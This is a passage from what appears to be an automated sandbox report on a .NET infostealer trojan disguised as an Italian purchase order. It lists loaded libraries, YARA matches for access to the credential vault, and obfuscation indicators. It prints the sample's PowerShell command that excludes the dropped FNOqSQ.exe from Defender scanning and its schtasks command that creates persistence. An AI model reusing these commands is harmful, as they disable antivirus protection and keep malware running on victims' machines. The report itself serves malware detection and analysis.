                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeCode function: 7_2_0736B3087_2_0736B308
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeCode function: 7_2_073622807_2_07362280
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeCode function: 7_2_07366F587_2_07366F58
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeCode function: 7_2_07366F487_2_07366F48
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeCode function: 7_2_07366B207_2_07366B20
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeCode function: 7_2_07366B107_2_07366B10
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeCode function: 7_2_073678307_2_07367830
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeCode function: 7_2_0736781F7_2_0736781F
                    Source: PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4124370819.0000000003A0C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs PUK ITALIA PO 120610549.EXE.exe
                    Source: PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4124370819.00000000038E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename106790a0-b81d-4bde-9832-48ebd9bb7fec.exe4 vs PUK ITALIA PO 120610549.EXE.exe
                    Source: PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4128077846.00000000070F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilename106790a0-b81d-4bde-9832-48ebd9bb7fec.exe4 vs PUK ITALIA PO 120610549.EXE.exe
                    Source: PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4120310835.000000000098E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PUK ITALIA PO 120610549.EXE.exe
                    Source: PUK ITALIA PO 120610549.EXE.exe, 00000000.00000002.4121165518.0000000002621000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWagon.dll> vs PUK ITALIA PO 120610549.EXE.exe
                    Source: PUK ITALIA PO 120610549.EXE.exeBinary or memory string: OriginalFilenameRIoz.exe@ vs PUK ITALIA PO 120610549.EXE.exe
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: PUK ITALIA PO 120610549.EXE.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.PUK ITALIA PO 120610549.EXE.exe.70f0000.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.PUK ITALIA PO 120610549.EXE.exe.38e8f80.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.PUK ITALIA PO 120610549.EXE.exe.39255a0.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.PUK ITALIA PO 120610549.EXE.exe.70f0000.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.PUK ITALIA PO 120610549.EXE.exe.39255a0.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.PUK ITALIA PO 120610549.EXE.exe.38e8f80.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 00000000.00000002.4128077846.00000000070F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: PUK ITALIA PO 120610549.EXE.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: FNOqSQ.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.PUK ITALIA PO 120610549.EXE.exe.39255a0.5.raw.unpack, ISZbPXDvPz.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.PUK ITALIA PO 120610549.EXE.exe.39255a0.5.raw.unpack, ISZbPXDvPz.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 0.2.PUK ITALIA PO 120610549.EXE.exe.39255a0.5.raw.unpack, nAXAT51m.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.PUK ITALIA PO 120610549.EXE.exe.39255a0.5.raw.unpack, nAXAT51m.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.PUK ITALIA PO 120610549.EXE.exe.39255a0.5.raw.unpack, nAXAT51m.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.PUK ITALIA PO 120610549.EXE.exe.39255a0.5.raw.unpack, nAXAT51m.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.PUK ITALIA PO 120610549.EXE.exe.39255a0.5.raw.unpack, YpS.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.PUK ITALIA PO 120610549.EXE.exe.39255a0.5.raw.unpack, YpS.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 7.2.FNOqSQ.exe.2c2aeb4.4.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                    Source: 0.2.PUK ITALIA PO 120610549.EXE.exe.266aeb0.0.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                    Source: 7.2.FNOqSQ.exe.2c8f428.5.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/9@2/2
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeFile created: C:\Users\user\AppData\Roaming\FNOqSQ.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7344:120:WilError_03
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeMutant created: \Sessions\1\BaseNamedObjects\bavwhFhCArCBbpvzH
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7292:120:WilError_03
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeFile created: C:\Users\user\AppData\Local\Temp\tmpEADA.tmpJump to behavior
                    Source: PUK ITALIA PO 120610549.EXE.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: PUK ITALIA PO 120610549.EXE.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: PUK ITALIA PO 120610549.EXE.exeReversingLabs: Detection: 65%
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeFile read: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exe
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FNOqSQ.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FNOqSQ" /XML "C:\Users\user\AppData\Local\Temp\tmpEADA.tmp
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\FNOqSQ.exe C:\Users\user\AppData\Roaming\FNOqSQ.exe
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FNOqSQ.exeJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FNOqSQ" /XML "C:\Users\user\AppData\Local\Temp\tmpEADA.tmpJump to behavior
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: PUK ITALIA PO 120610549.EXE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: PUK ITALIA PO 120610549.EXE.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: PUK ITALIA PO 120610549.EXE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: RIoz.pdb source: PUK ITALIA PO 120610549.EXE.exe, FNOqSQ.exe.0.dr
                    Source: Binary string: RIoz.pdbSHA2563 source: PUK ITALIA PO 120610549.EXE.exe, FNOqSQ.exe.0.dr

                    Data Obfuscation

                    barindex
                    Source: 0.2.PUK ITALIA PO 120610549.EXE.exe.2647048.1.raw.unpack, ivtNue3aMakjbVsfus.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    Source: PUK ITALIA PO 120610549.EXE.exe, Form1.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                    Source: FNOqSQ.exe.0.dr, Form1.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                    Source: PUK ITALIA PO 120610549.EXE.exeStatic PE information: 0xE07D262E [Sat May 7 09:55:58 2089 UTC]
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeCode function: 0_2_024CF1B0 push eax; iretd 0_2_024CF1B1
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeCode function: 0_2_024C756B push eax; iretd 0_2_024C7589
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeCode function: 0_2_07183EE3 pushfd ; iretd 0_2_07183EE9
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeCode function: 0_2_09D6C100 push eax; ret 0_2_09D6C101
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeCode function: 0_2_09D6C85A pushad ; retf 0_2_09D6C925
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeCode function: 7_2_0108F1B0 push eax; iretd 7_2_0108F1B1
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeCode function: 7_2_0108756A push eax; iretd 7_2_01087589
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeCode function: 7_2_05093938 pushfd ; iretd 7_2_05093939
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeCode function: 7_2_050938F0 pushad ; iretd 7_2_050938F1
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeCode function: 7_2_07363EE2 pushfd ; iretd 7_2_07363EE9
                    Source: C:\Users\user\AppData\Roaming\FNOqSQ.exeCode function: 7_2_0736A9DD push FFFFFF8Bh; iretd 7_2_0736A9DF
                    Source: PUK ITALIA PO 120610549.EXE.exeStatic PE information: section name: .text entropy: 7.990207486581012
                    Source: FNOqSQ.exe.0.drStatic PE information: section name: .text entropy: 7.990207486581012
                    Source: 0.2.PUK ITALIA PO 120610549.EXE.exe.2647048.1.raw.unpack, H8RxCCTG2lqB13Rl08.csHigh entropy of concatenated method names: 'BWXySrfaKk', 'O1uyJIJkvJ', 'FYuy29LETE', 'Nr6yB8b3kD', 'tquyCnxVtm', 'xG3y49hv1M', 'aMxypkVXs0', 'zXZyj69DS7', 'VfeyH0y2yr', 'ARhyKeRyuC'
                    Source: 0.2.PUK ITALIA PO 120610549.EXE.exe.2647048.1.raw.unpack, ivtNue3aMakjbVsfus.csHigh entropy of concatenated method names: 'hayyrDbcfV', 'RgtTUJcyZL', 'gT8yhPI3jg', 'D4SyXwSaZ8', 'eGDyD0eGyP', 'Q1my3V6pua', 'HJq5kCF3PwuIZ', 'v2v9oltHw', 'V3yxNksFn', 'LmcVIqhFH'
                    Source: C:\Users\user\Desktop\PUK ITALIA PO 120610549.EXE.exeFile created: C:\Users\user\AppData\Roaming\FNOqSQ.exeJump to dropped file

                    Boot Survival

                    barindex
